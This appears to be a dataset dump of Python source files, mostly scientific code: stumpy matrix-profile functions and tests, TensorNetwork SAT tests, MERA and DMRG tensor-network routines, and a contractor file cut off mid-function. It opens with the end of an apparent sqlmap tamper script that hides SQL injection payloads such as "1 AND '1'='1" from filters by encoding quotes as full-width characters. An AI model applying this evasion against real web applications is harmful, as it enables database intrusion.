* http://sla.ckers.org/forum/read.php?13,11562,11850
* http://lukasz.pilorz.net/testy/full_width_utf/index.phps
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
"""
return payload.replace('\'', "%EF%BC%87") if payload else payload
``` |
{
"source": "0xflotus/stumpy",
"score": 2
} |
#### File: stumpy/stumpy/stamp.py
```python
import numpy as np
from . import core
def mass(Q, T, M_T, Σ_T, trivial_idx=None, excl_zone=0, left=False, right=False):
"""
Compute "Mueen's Algorithm for Similarity Search" (MASS)
Parameters
----------
Q : ndarray
Query array or subsequence
T : ndarray
Time series array or sequence
M_T : ndarray
Sliding mean for `T`
Σ_T : ndarray
Sliding standard deviation for `T`
trivial_idx : int
Index for the start of the trivial self-join
excl_zone : int
The half width for the exclusion zone relative to the `trivial_idx`.
If the `trivial_idx` is `None` then this parameter is ignored.
left : bool
Return the left matrix profile indices if `True`. If `right` is True
then this parameter is ignored.
right : bool
Return the right matrix profiles indices if `True`
Returns
-------
P : ndarray
Matrix profile
I : ndarray
Matrix profile indices
"""
D = core.mass(Q, T, M_T, Σ_T)
if trivial_idx is not None:
zone_start = max(0, trivial_idx-excl_zone)
zone_stop = min(T.shape[0]-Q.shape[0]+1, trivial_idx+excl_zone)
D[zone_start:zone_stop] = np.inf
#Get left and right matrix profiles
IL = -1
PL = np.inf
if D[:trivial_idx].size:
IL = np.argmin(D[:trivial_idx])
PL = D[IL]
if zone_start <= IL <= zone_stop:
IL = -1
IR = -1
PR = -1
if D[trivial_idx:].size:
IR = trivial_idx + np.argmin(D[trivial_idx:])
PR = D[IR]
if zone_start <= IR <= zone_stop:
IR = -1
# Element-wise Min
I = np.argmin(D)
P = D[I]
if trivial_idx is not None and left:
I = IL
P = PL
if trivial_idx is not None and right:
I = IR
P = PR
return P, I
def stamp(T_A, T_B, m, ignore_trivial=False):
"""
Compute matrix profile and indices using the "Scalable Time series
Anytime Matrix Profile" (STAMP) algorithm and MASS (2017 - with FFT).
Parameters
----------
T_A : ndarray
The time series or sequence for which the matrix profile index will
be returned
T_B : ndarray
The time series or sequence that contain your query subsequences
m : int
Window size
ignore_trivial : bool
`True` if this is a self join and `False` otherwise (i.e., AB-join).
Returns
-------
out : ndarray
Two column numpy array where the first column is the matrix profile
and the second column is the matrix profile indices
Notes
-----
DOI: 10.1109/ICDM.2016.0179
See Table III
Timeseries, T_B, will be annotated with the distance location
(or index) of all its subsequences in another times series, T_A.
For every subsequence, Q, in T_B, you will get a distance and index for
the closest subsequence in T_A. Thus, the array returned will have length
T_B.shape[0]-m+1
"""
core.check_dtype(T_A)
core.check_dtype(T_B)
subseq_T_B = core.rolling_window(T_B, m)
excl_zone = int(np.ceil(m/2))
M_T, Σ_T = core.compute_mean_std(T_A, m)
# Add exclusionary zone
if ignore_trivial:
out = [mass(subseq, T_A, M_T, Σ_T, i, excl_zone) for i, subseq in enumerate(subseq_T_B)]
else:
out = [mass(subseq, T_A, M_T, Σ_T) for subseq in subseq_T_B]
out = np.array(out, dtype=object)
return out
```
#### File: stumpy/tests/test_core.py
```python
import numpy as np
import numpy.testing as npt
from stumpy import core
import pytest
def naive_rolling_window_dot_product(Q, T):
window = len(Q)
result = np.zeros(len(T) - window + 1)
for i in range(len(result)):
result[i] = np.dot(T[i:i + window], Q)
return result
test_data = [
(np.array([-1,1,2], dtype=np.float64),np.array(range(5), dtype=np.float64)),
(np.array([9,8100,-60], dtype=np.float64), np.array([584,-11,23,79,1001], dtype=np.float64)),
(np.random.uniform(-1000, 1000, [8]), np.random.uniform(-1000, 1000, [64])),
]
@pytest.mark.parametrize("Q, T", test_data)
def test_sliding_dot_product(Q, T):
left = naive_rolling_window_dot_product(Q, T)
right = core.sliding_dot_product(Q, T)
npt.assert_almost_equal(left, right)
@pytest.mark.parametrize("Q, T", test_data)
def test_compute_mean_std(Q, T):
m = Q.shape[0]
left_μ_Q = np.sum(Q)/m
left_σ_Q = np.sqrt(np.sum(np.square(Q-left_μ_Q)/m))
left_M_T = np.mean(core.rolling_window(T, m), axis=1)
left_Σ_T = np.std(core.rolling_window(T, m), axis=1)
right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m)
right_M_T, right_Σ_T = core.compute_mean_std(T, m)
npt.assert_almost_equal(left_μ_Q, right_μ_Q)
npt.assert_almost_equal(left_σ_Q, right_σ_Q)
npt.assert_almost_equal(left_M_T, right_M_T)
npt.assert_almost_equal(left_Σ_T, right_Σ_T)
@pytest.mark.parametrize("Q, T", test_data)
def test_calculate_distance_profile(Q, T):
m = Q.shape[0]
left = np.linalg.norm(core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1)
QT = core.sliding_dot_product(Q, T)
μ_Q, σ_Q = core.compute_mean_std(Q, m)
M_T, Σ_T = core.compute_mean_std(T, m)
right = core.calculate_distance_profile(m, QT, μ_Q, σ_Q, M_T, Σ_T)
npt.assert_almost_equal(left, right)
@pytest.mark.parametrize("Q, T", test_data)
def test_mueen_calculate_distance_profile(Q, T):
m = Q.shape[0]
left = np.linalg.norm(core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1)
right = core.mueen_calculate_distance_profile(Q,T)
npt.assert_almost_equal(left, right)
@pytest.mark.parametrize("Q, T", test_data)
def test_mass(Q, T):
m = Q.shape[0]
left = np.linalg.norm(core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1)
right = core.mass(Q, T)
npt.assert_almost_equal(left, right)
``` |
{
"source": "0xflotus/TensorNetwork",
"score": 2
} |
#### File: examples/sat/sat_tensornetwork_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
tf.enable_v2_behavior()
import tensornetwork
from examples.sat import sat_tensornetwork
class SATTensorNetworkTest(tf.test.TestCase):
def test_sanity_check(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 7)
def test_dual_clauses(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
(1, -2, 3),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 6)
def test_dual_clauses(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
(1, 2, -3),
(1, -2, 3),
(1, -2, -3),
(-1, 2, 3),
(-1, 2, -3),
(-1, -2, 3),
(-1, -2, -3),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 0)
def test_four_variables(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
(1, 2, 4),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 13)
def test_four_variables_four_clauses(self):
net = sat_tensornetwork.sat_count_tn([
(1, 2, 3),
(1, 2, 4),
(-3, -4, 2),
(-1, 3, -2),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 9)
def test_single_variable(self):
net = sat_tensornetwork.sat_count_tn([
(1, 1, 1),
])
count = tensornetwork.contractors.naive(net).get_final_node().get_tensor()
self.assertEqual(count.numpy(), 1)
def test_solutions(self):
net, edge_order = sat_tensornetwork.sat_tn([
(1, 2, -3),
])
network = tensornetwork.contractors.naive(net)
solutions_node = network.get_final_node().reorder_edges(edge_order)
solutions = solutions_node.get_tensor()
self.assertEqual(solutions.numpy()[0][0][0], 1)
# Only unaccepted value.
self.assertEqual(solutions.numpy()[0][0][1], 0)
self.assertEqual(solutions.numpy()[0][1][0], 1)
self.assertEqual(solutions.numpy()[0][1][1], 1)
self.assertEqual(solutions.numpy()[1][0][0], 1)
self.assertEqual(solutions.numpy()[1][0][1], 1)
self.assertEqual(solutions.numpy()[1][1][0], 1)
self.assertEqual(solutions.numpy()[1][1][1], 1)
if __name__ == '__main__':
tf.test.main()
```
#### File: experiments/MERA/binary_mera_example.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
NUM_THREADS = 4
import os
os.environ['OMP_NUM_THREADS'] = str(NUM_THREADS)
os.environ["KMP_BLOCKTIME"] = "0"
os.environ["KMP_AFFINITY"] = "granularity=fine,verbose,compact,1,0"
import tensorflow as tf
import copy
import numpy as np
import time
import pickle
import experiments.MERA.binary_mera_lib as bml
import experiments.MERA.binary_mera as bm
import experiments.MERA.misc_mera as misc_mera
from sys import stdout
import datetime
config = tf.ConfigProto()
config.intra_op_parallelism_threads = NUM_THREADS
config.inter_op_parallelism_threads = 1
tf.enable_eager_execution(config)
tf.enable_v2_behavior()
def optimize_binary_mera(chis,
numiters,
noises,
opt_all_layers,
embeddings,
dtype,
nsteps_ss,
use_gpu=False):
fname = 'binary_mera_optimization'
rootdir = os.getcwd()
if not os.path.exists(fname):
os.mkdir(fname)
os.chdir(fname)
DEVICES = tf.contrib.eager.list_devices()
print("Available devices:")
for i, device in enumerate(DEVICES):
print("%d) %s" % (i, device))
CPU = '/device:CPU:0'
GPU = '/job:localhost/replica:0/task:0/device:GPU:0'
if use_gpu:
specified_device_type = GPU
name = 'GPU'
else:
specified_device_type = CPU
name = 'CPU'
with tf.device(device):
wC, uC, _, _ = bm.run_binary_mera_optimization_TFI(
chis=chis,
niters=numiters,
embeddings=embeddings,
dtype=dtype,
verbose=1,
nsteps_steady_state=nsteps_ss,
numpy_update=True,
opt_u_after=30,
noises=noises,
opt_all_layers=opt_all_layers,
filename=None)
os.chdir(rootdir)
return wC, uC
def load_and_optimize_binary_mera(loadname,
filename,
chis,
numiters,
noises,
opt_all_layers,
embeddings,
nsteps_ss,
use_gpu=False):
with open(loadname, 'rb') as f:
wC, uC = pickle.load(f)
fname = 'binary_mera_optimization'
rootdir = os.getcwd()
if not os.path.exists(fname):
os.mkdir(fname)
os.chdir(fname)
DEVICES = tf.contrib.eager.list_devices()
print("Available devices:")
for i, device in enumerate(DEVICES):
print("%d) %s" % (i, device))
CPU = '/device:CPU:0'
GPU = '/job:localhost/replica:0/task:0/device:GPU:0'
if use_gpu:
specified_device_type = GPU
name = 'GPU'
else:
specified_device_type = CPU
name = 'CPU'
dtype = wC[-1].dtype
num_trans_layers = len(chis)
filename = str(datetime.date.today()) + filename \
+ 'resumed_bin_mera_opt_Nthreads{0}_chimax{1}_numtrans{2}_nss{3}'.format(
NUM_THREADS, max(chis), num_trans_layers + len(wC), nsteps_ss)
with tf.device(device):
wC, uC, _, _ = bm.run_binary_mera_optimization_TFI(
chis=chis,
niters=numiters,
embeddings=embeddings,
dtype=dtype,
verbose=1,
nsteps_steady_state=nsteps_ss,
numpy_update=True,
opt_u_after=0,
noises=noises,
opt_all_layers=opt_all_layers,
wC=wC,
uC=uC,
filename=filename)
os.chdir(rootdir)
def get_scaling_dims(loadname, savename, use_gpu=False, k=11):
with open(loadname, 'rb') as f:
wC, uC = pickle.load(f)
fname = 'binary_mera_optimization'
rootdir = os.getcwd()
if not os.path.exists(fname):
os.mkdir(fname)
os.chdir(fname)
DEVICES = tf.contrib.eager.list_devices()
print("Available devices:")
for i, device in enumerate(DEVICES):
print("%d) %s" % (i, device))
CPU = '/device:CPU:0'
GPU = '/job:localhost/replica:0/task:0/device:GPU:0'
if use_gpu:
specified_device_type = GPU
name = 'GPU'
else:
specified_device_type = CPU
name = 'CPU'
filename = savename
scaling_dims = {}
# with open(filename, 'rb') as f:
# scaling_dims = pickle.load(f)
with tf.device(device):
for n in reversed(range(len(wC) - 2, len(wC))):
print(np.array(wC[n].shape))
if not misc_mera.all_same_chi(wC[n]):
continue
scaling_dims[n] = bml.get_scaling_dimensions(wC[n], uC[n], k=k)
print(scaling_dims[n])
with open(filename, 'wb') as f:
pickle.dump(scaling_dims, f)
if __name__ == "__main__":
chis = [4, 5, 6]
numiters = [1000, 100, 400]
noises = [1E-6, 1E-6, 1E-6]
opt_all_layers = [True, True, True]
embeddings = ['a', 'a', 'a']
dtype = tf.float64
nsteps_ss = 10
num_scaling_dims = 11
wC, uC = optimize_binary_mera(
chis=chis,
numiters=numiters,
noises=noises,
opt_all_layers=opt_all_layers,
embeddings=embeddings,
dtype=dtype,
nsteps_ss=nsteps_ss,
use_gpu=False)
scaling_dims = bml.get_scaling_dimensions(
wC[-1], uC[-1], k=num_scaling_dims)
print()
print(
'first {0} eigen values of the ascending super-operator at bond dimension {1}:'
.format(num_scaling_dims, chis[-1]))
print(scaling_dims)
```
#### File: experiments/MPS/DMRG.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
sys.path.append('../')
import time
import ncon as ncon
import numpy as np
import tensorflow as tf
import Lanczos as LZ
from sys import stdout
import misc_mps
import functools as fct
from matrixproductstates import InfiniteMPSCentralGauge, FiniteMPSCentralGauge
class MPSSimulationBase:
def __init__(self, mps, mpo, lb, rb, name):
"""
Base class for simulation objects; upon initialization, creates all
left and right envvironment blocks
mps: MPS object
the initial mps
mpo: MPO object
Hamiltonian in MPO format
name: str
the name of the simulation
lb: np.ndarray of shape (D,D,M), or None
the left environment;
lb has to have shape (mps[0].shape[0],mps[0].shape[0],mpo[0].shape[0])
if None, obc are assumed, and lb=ones((mps[0].shape[0],mps[0].shape[0],mpo[0].shape[0]))
rb: np.ndcarray of shape (D,D,M), or None
the right environment
rb has to have shape (mps[-1].shape[1],mps[-1].shape[1],mpo[-1].shape[1])
if None, obc are assumed, and rb=ones((mps[-1].shape[1],mps[-1].shape[1],mpo[-1].shape[1]))
"""
self.mps = mps
self.mpo = mpo
if not self.mps.dtype == self.mpo.dtype:
raise TypeError('the types of mps and mpo are not compatible')
if len(mps) != len(mpo):
raise ValueError('len(mps)!=len(mpo)')
self.mps.position(0)
self.lb = lb
self.rb = rb
self.left_envs = {0: self.lb}
self.right_envs = {len(mps) - 1: self.rb}
def __len__(self):
"""
return the length of the simulation
"""
return len(self.mps)
@property
def dtype(self):
"""
return the data-type of the MPSSimulationBase
type is obtained from applying np.result_type
to the mps and mpo objects
"""
assert (self.mps.dtype == self.mpo.dtype)
return self.mps.dtype
@staticmethod
def add_layer(B,
mps_tensor,
mpo_tensor,
conj_mps_tensor,
direction,
walltime_log=None):
"""
adds an mps-mpo-mps layer to a left or right block "E"; used in dmrg to calculate the left and right
environments
Parameters:
---------------------------
B: Tensor object
a tensor of shape (D1,D1',M1) (for direction>0) or (D2,D2',M2) (for direction>0)
mps_tensor: Tensor object of shape =(Dl,Dr,d)
mpo_tensor: Tensor object of shape = (Ml,Mr,d,d')
conj_mps_tensor: Tensor object of shape =(Dl',Dr',d')
the mps tensor on the conjugated side
this tensor will be complex conjugated inside the routine; usually, the user will like to pass
the unconjugated tensor
direction: int or str
direction in (1,'l','left'): add a layer to the right of ```B```
direction in (-1,'r','right'): add a layer to the left of ```B```
Return:
-----------------
Tensor of shape (Dr,Dr',Mr) for direction in (1,'l','left')
Tensor of shape (Dl,Dl',Ml) for direction in (-1,'r','right')
"""
if walltime_log:
t1 = time.time()
out = misc_mps.add_layer(
B, mps_tensor, mpo_tensor, conj_mps_tensor, direction=direction)
if walltime_log:
walltime_log(lan=[], QR=[], add_layer=[time.time() - t1], num_lan=[])
return out
def position(self, n):
"""
shifts the center position of mps to bond n, and updates left and right environments
accordingly; Left blocks at site > n are None, and right blocks at site < n are None
Note that the index convention for R blocks is reversed, i.e. self.right_envs[0] is self.rb,
self.right_envs[1] is the second right most R-block, a.s.o
Parameters:
------------------------------------
n: int
the bond to which the position should be shifted
returns: self
"""
if n > len(self.mps):
raise IndexError("MPSSimulationBase.position(n): n>len(mps)")
if n < 0:
raise IndexError("MPSSimulationBase.position(n): n<0")
if n == self.mps.pos:
return
elif n > self.mps.pos:
pos = self.mps.pos
if self.walltime_log:
t1 = time.time()
self.mps.position(n)
if self.walltime_log:
self.walltime_log(
lan=[], QR=[time.time() - t1], add_layer=[], num_lan=[])
for m in range(pos, n):
self.left_envs[m + 1] = self.add_layer(
self.left_envs[m],
self.mps[m],
self.mpo[m],
self.mps[m],
direction=1,
walltime_log=self.walltime_log)
elif n < self.mps.pos:
pos = self.mps.pos
if self.walltime_log:
t1 = time.time()
self.mps.position(n)
if self.walltime_log:
self.walltime_log(
lan=[], QR=[time.time() - t1], add_layer=[], num_lan=[])
for m in reversed(range(n, pos)):
self.right_envs[m - 1] = self.add_layer(
self.right_envs[m],
self.mps[m],
self.mpo[m],
self.mps[m],
direction=-1,
walltime_log=self.walltime_log)
for m in range(n + 1, len(self.mps) + 1):
try:
del self.left_envs[m]
except KeyError:
pass
for m in range(-1, n - 1):
try:
del self.right_envs[m]
except KeyError:
pass
return self
def update(self):
"""
shift center site of the MPSSimulationBase to 0 and recalculate all left and right blocks
"""
self.mps.position(0)
self.compute_left_envs()
self.compute_right_envs()
return self
class DMRGUnitCellEngine(MPSSimulationBase):
"""
DMRGUnitCellEngine
simulation container for density matrix renormalization group optimization
"""
def __init__(self, mps, mpo, lb, rb, name='DMRG'):
"""
initialize an MPS object
mps: MPS object
the initial mps
mpo: MPO object
Hamiltonian in MPO format
name: str
the name of the simulation
lb,rb: None or np.ndarray
left and right environment boundary conditions
if None, obc are assumed
user can provide lb and rb to fix the boundary condition of the mps
shapes of lb, rb, mps[0] and mps[-1] have to be consistent
"""
self.walltime_log = None
super().__init__(mps=mps, mpo=mpo, name=name, lb=lb, rb=rb)
self.compute_right_envs()
def compute_left_envs(self):
"""
compute all left environment blocks
up to self.mps.position; all blocks for site > self.mps.position are set to None
"""
self.left_envs = {}
self.left_envs[0] = self.lb
for n in range(self.mps.pos):
self.left_envs[n + 1] = self.add_layer(
B=self.left_envs[n],
mps_tensor=self.mps[n],
mpo_tensor=self.mpo[n],
conj_mps_tensor=self.mps[n],
direction=1,
walltime_log=self.walltime_log)
def compute_right_envs(self):
"""
compute all right environment blocks
up to self.mps.position; all blocks for site < self.mps.position are set to None
"""
self.right_envs = {}
self.right_envs[len(self.mps) - 1] = self.rb
for n in reversed(range(self.mps.pos, len(self.mps))):
self.right_envs[n - 1] = self.add_layer(
B=self.right_envs[n],
mps_tensor=self.mps[n],
mpo_tensor=self.mpo[n],
conj_mps_tensor=self.mps[n],
direction=-1,
walltime_log=self.walltime_log)
def _optimize_2s_local(self,
thresh=1E-10,
D=None,
ncv=40,
Ndiag=10,
landelta=1E-5,
landeltaEta=1E-5,
verbose=0):
raise NotImplementedError()
mpol = self.mpo[self.mpo.pos - 1]
mpor = self.mpo[self.mpo.pos]
Ml, Mc, dl, dlp = mpol.shape
Mc, Mr, dr, drp = mpor.shape
mpo = tf.reshape(
ncon.ncon([mpol, mpor], [[-1, 1, -3, -5], [1, -2, -4, -6]]),
[Ml, Mr, dl * dr, dlp * drp])
initial = ncon.ncon(
[self.mps[self.mps.pos - 1], self.mps.mat, self.mps[self.mps.pos]],
[[-1, -2, 1], [1, 2], [2, -3, -4]])
Dl, dl, dr, Dr = initial.shape
tf.reshape(initial, [Dl, dl * dr, Dr])
if self.walltime_log:
t1 = time.time()
nit, vecs, alpha, beta = LZ.do_lanczos(
L=self.left_envs[self.mps.pos - 1],
mpo=mpo,
R=self.right_envs[self.mps.pos],
initial_state=initial,
ncv=ncv,
delta=landelta)
if self.walltime_log:
self.walltime_log(
lan=[(time.time() - t1) / float(nit)] * int(nit),
QR=[],
add_layer=[],
num_lan=[int(nit)])
temp = tf.reshape(
tf.reshape(opt, [
self.mps.D[self.mps.pos - 1], dlp, drp, self.mps.D[self.mps.pos + 1]
]), [])
opt.split(mps_merge_data).transpose(0, 2, 3, 1).merge([[0, 1], [2, 3]])
U, S, V = temp.svd(truncation_threshold=thresh, D=D)
Dnew = S.shape[0]
if verbose > 0:
stdout.write(
"\rTS-DMRG it=%i/%i, sites=(%i,%i)/%i: optimized E=%.16f+%.16f at D=%i"
% (self._it, self.Nsweeps, self.mps.pos - 1, self.mps.pos,
len(self.mps), tf.real(e), tf.imag(e), Dnew))
stdout.flush()
if verbose > 1:
print("")
Z = np.sqrt(ncon.ncon([S, S], [[1], [1]]))
self.mps.mat = S.diag() / Z
self.mps[self.mps.pos - 1] = U.split([merge_data[0],
[U.shape[1]]]).transpose(0, 2, 1)
self.mps[self.mps.pos] = V.split([[V.shape[0]], merge_data[1]]).transpose(
0, 2, 1)
self.left_envs[self.mps.pos] = self.add_layer(
B=self.left_envs[self.mps.pos - 1],
mps_tensor=self.mps[self.mps.pos - 1],
mpo_tensor=self.mpo[self.mps.pos - 1],
conj_mps_tensor=self.mps[self.mps.pos - 1],
direction=1)
self.right_envs[self.mps.pos - 1] = self.add_layer(
B=self.right_envs[self.mps.pos],
mps_tensor=self.mps[self.mps.pos],
mpo_tensor=self.mpo[self.mps.pos],
conj_mps_tensor=self.mps[self.mps.pos],
direction=-1)
return e
def _optimize_1s_local(self,
site,
sweep_dir,
ncv=40,
Ndiag=10,
landelta=1E-5,
landeltaEta=1E-5,
verbose=0):
if sweep_dir in (-1, 'r', 'right'):
if self.mps.pos != site:
raise ValueError(
'_optimize_1s_local for sweep_dir={2}: site={0} != mps.pos={1}'.
format(site, self.mps.pos, sweep_dir))
if sweep_dir in (1, 'l', 'left'):
if self.mps.pos != (site + 1):
raise ValueError(
'_optimize_1s_local for sweep_dir={2}: site={0}, mps.pos={1}'.
format(site, self.mps.pos, sweep_dir))
if sweep_dir in (-1, 'r', 'right'):
#NOTE (martin) don't use get_tensor here
initial = ncon.ncon([self.mps.mat, self.mps[site]],
[[-1, 1], [1, -2, -3]])
elif sweep_dir in (1, 'l', 'left'):
#NOTE (martin) don't use get_tensor here
initial = ncon.ncon([self.mps[site], self.mps.mat],
[[-1, -2, 1], [1, -3]])
if self.walltime_log:
t1 = time.time()
nit, vecs, alpha, beta = LZ.do_lanczos(
L=self.left_envs[site],
mpo=self.mpo[site],
R=self.right_envs[site],
initial_state=initial,
ncv=np.min([
ncv,
int(initial.shape[0]) * int(initial.shape[1]) * int(
initial.shape[2])
]),
delta=landelta)
if self.walltime_log:
self.walltime_log(
lan=[(time.time() - t1) / float(nit)] * int(nit),
QR=[],
add_layer=[],
num_lan=[int(nit)])
e, opt = LZ.tridiag(vecs, alpha, beta)
Dnew = opt.shape[2]
# if verbose == (-1):
# print(f"SS-DMRG site={site}: optimized E={e}")
if verbose > 0:
stdout.write(
"\rSS-DMRG it=%i/%i, site=%i/%i: optimized E=%.16f+%.16f at D=%i" %
(self._it, self.Nsweeps, site, len(self.mps), np.real(e), np.imag(e),
Dnew))
stdout.flush()
if verbose > 1:
print("")
if self.walltime_log:
t1 = time.time()
if sweep_dir in (-1, 'r', 'right'):
A, mat, Z = misc_mps.prepare_tensor_QR(opt, direction='l')
A /= Z
elif sweep_dir in (1, 'l', 'left'):
mat, B, Z = misc_mps.prepare_tensor_QR(opt, direction='r')
B /= Z
if self.walltime_log:
self.walltime_log(lan=[], QR=[time.time() - t1], add_layer=[], num_lan=[])
self.mps.mat = mat
if sweep_dir in (-1, 'r', 'right'):
self.mps._tensors[site] = A
self.mps.pos += 1
self.left_envs[site + 1] = self.add_layer(
B=self.left_envs[site],
mps_tensor=self.mps[site],
mpo_tensor=self.mpo[site],
conj_mps_tensor=self.mps[site],
direction=1,
walltime_log=self.walltime_log)
elif sweep_dir in (1, 'l', 'left'):
self.mps._tensors[site] = B
self.mps.pos = site
self.right_envs[site - 1] = self.add_layer(
B=self.right_envs[site],
mps_tensor=self.mps[site],
mpo_tensor=self.mpo[site],
conj_mps_tensor=self.mps[site],
direction=-1,
walltime_log=self.walltime_log)
return e
def run_one_site(self,
Nsweeps=4,
precision=1E-6,
ncv=40,
verbose=0,
delta=1E-10,
deltaEta=1E-10,
walltime_log=None):
"""
do a one-site DMRG optimzation for an open system
Paramerters:
Nsweeps: int
number of left-right sweeps
precision: float
desired precision of the ground state energy
ncv: int
number of krylov vectors
verbose: int
verbosity flag
delta: float
orthogonality threshold; once the next vector of the iteration is orthogonal to the previous ones
within ```delta``` precision, iteration is terminated
deltaEta: float
desired precision of the energies; once eigenvalues of tridiad Hamiltonian are converged within ```deltaEta```
iteration is terminated
walltime_log: callable or None
if not None, walltime_log is passed to do_lanczos, add_layer and prepare_tensor_QR to
log runtimes
"""
self.walltime_log = walltime_log
converged = False
energy = 1E100
self._it = 1
self.Nsweeps = Nsweeps
while not converged:
self.position(0)
#the part outside the loop covers the len(self)==1 case
e = self._optimize_1s_local(
site=0,
sweep_dir='right',
ncv=ncv,
landelta=delta,
landeltaEta=deltaEta,
verbose=verbose)
for n in range(1, len(self.mps) - 1):
#_optimize_1site_local shifts the center site internally
e = self._optimize_1s_local(
site=n,
sweep_dir='right',
ncv=ncv,
landelta=delta,
landeltaEta=deltaEta,
verbose=verbose)
#prepare for right weep: move center all the way to the right
self.position(len(self.mps))
for n in range(len(self.mps) - 1, 0, -1):
#_optimize_1site_local shifts the center site internally
e = self._optimize_1s_local(
site=n,
sweep_dir='left',
ncv=ncv,
landelta=delta,
landeltaEta=deltaEta,
verbose=verbose)
if np.abs(e - energy) < precision:
converged = True
energy = e
self._it += 1
if self._it > Nsweeps:
if verbose > 0:
print()
print(
'dmrg did not converge to desired precision {0} after {1} iterations'
.format(precision, Nsweeps))
break
return e
class FiniteDMRGEngine(DMRGUnitCellEngine):
def __init__(self, mps, mpo, name='FiniteDMRG'):
# if not isinstance(mps, FiniteMPSCentralGauge):
# raise TypeError(
# 'in FiniteDMRGEngine.__init__(...): mps of type FiniteMPSCentralGauge expected, got {0}'
# .format(type(mps)))
lb = tf.ones([mps.D[0], mps.D[0], mpo.D[0]], dtype=mps.dtype)
rb = tf.ones([mps.D[-1], mps.D[-1], mpo.D[-1]], dtype=mps.dtype)
super().__init__(mps=mps, mpo=mpo, lb=lb, rb=rb, name=name)
class InfiniteDMRGEngine(DMRGUnitCellEngine):
def __init__(self,
mps,
mpo,
name='InfiniteDMRG',
precision=1E-12,
precision_canonize=1E-12,
nmax=1000,
nmax_canonize=1000,
ncv=40,
numeig=1,
pinv=1E-20,
power_method=False):
# if not isinstance(mps, InfiniteMPSCentralGauge):
# raise TypeError(
# 'in InfiniteDMRGEngine.__init__(...): mps of type InfiniteMPSCentralGauge expected, got {0}'
# .format(type(mps)))
mps.restore_form(
precision=precision_canonize,
ncv=ncv,
nmax=nmax_canonize,
numeig=numeig,
power_method=power_method,
pinv=pinv) #this leaves state in left-orthogonal form
lb, hl = misc_mps.compute_steady_state_Hamiltonian_GMRES(
'l',
mps,
mpo,
left_dominant=tf.diag(tf.ones(mps.D[-1], dtype=mps.dtype)),
right_dominant=ncon.ncon([mps.mat, tf.conj(mps.mat)],
[[-1, 1], [-2, 1]]),
precision=precision,
nmax=nmax)
rmps = mps.get_right_orthogonal_imps(
precision=precision_canonize,
ncv=ncv,
nmax=nmax_canonize,
numeig=numeig,
pinv=pinv,
restore_form=False)
rb, hr = misc_mps.compute_steady_state_Hamiltonian_GMRES(
'r',
rmps,
mpo,
right_dominant=tf.diag(tf.ones(mps.D[0], dtype=mps.dtype)),
left_dominant=ncon.ncon([mps.mat, tf.conj(mps.mat)],
[[1, -1], [1, -2]]),
precision=precision,
nmax=nmax)
left_dominant = ncon.ncon([mps.mat, tf.conj(mps.mat)], [[1, -1], [1, -2]])
out = mps.unitcell_transfer_op('l', left_dominant)
super().__init__(mps=mps, mpo=mpo, lb=lb, rb=rb, name=name)
def shift_unitcell(self, sites):
"""
"""
self.position(sites)
new_lb = self.left_envs[sites]
new_rb = self.right_envs[sites - 1]
centermatrix = self.mps.mat
self.mps.position(len(self.mps)) #move centermatrix to the right
new_center_matrix = ncon.ncon([self.mps.mat, self.mps.connector],
[[-1, 1], [1, -2]])
self.mps.pos = sites
self.mps.mat = centermatrix
self.mps.position(0)
new_center_matrix = ncon.ncon([new_center_matrix, self.mps.mat],
[[-1, 1], [1, -2]])
tensors = [self.mps[n] for n in range(sites, len(self.mps))
] + [self.mps[n] for n in range(sites)]
self.mps._tensors = tensors
self.mpo._tensors = [self.mpo[n] for n in range(sites, len(self.mps))
] + [self.mpo[n] for n in range(sites)]
self.mps.connector = tf.linalg.inv(centermatrix)
self.mps.mat = new_center_matrix
self.mps.pos = len(self.mps) - sites
self.lb = new_lb
self.rb = new_rb
self.update()
def run_one_site(self,
Nsweeps=1,
precision=1E-6,
ncv=40,
verbose=0,
delta=1E-10,
deltaEta=1E-10):
self._idmrg_it = 0
converged = False
eold = 0.0
while not converged:
e = super().run_one_site(
Nsweeps=1,
precision=precision,
ncv=ncv,
verbose=verbose - 1,
delta=delta,
deltaEta=deltaEta)
self.shift_unitcell(sites=len(self.mps) // 2)
if verbose > 0:
stdout.write(
"\rSS-IDMRG it=%i/%i, energy per unit-cell E/N=%.16f+%.16f" %
(self._idmrg_it, Nsweeps, np.real((e - eold) / len(self.mps)),
np.imag((e - eold) / len(self.mps))))
stdout.flush()
if verbose > 1:
print('')
eold = e
self._idmrg_it += 1
if self._idmrg_it > Nsweeps:
converged = True
break
```
#### File: tensornetwork/contractors/stochastic_contractor.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
from typing import Tuple, Set, Optional, Dict
from tensornetwork import network
from tensornetwork import network_components
def find_parallel(edge: network_components.Edge
) -> Tuple[Set[network_components.Edge], int]:
"""Finds all edges shared between the nodes connected with the given edge.
Args:
edge: A non-dangling edge between two different nodes.
Returns:
parallel_edges: Edges that are parallel to the given edge.
parallel_dim: Product of sizes of all parallel edges.
"""
if edge.is_dangling():
raise ValueError(
"Cannot find parallel edges for dangling edge {}".format(edge))
nodes = {edge.node1, edge.node2}
parallel_dim = 1
parallel_edges = set()
for e in edge.node1.edges:
if set(e.get_nodes()) == nodes:
parallel_edges.add(e)
edge_size = list(e.node1.get_tensor().shape)[e.axis1]
if edge_size is not None:
parallel_dim *= edge_size
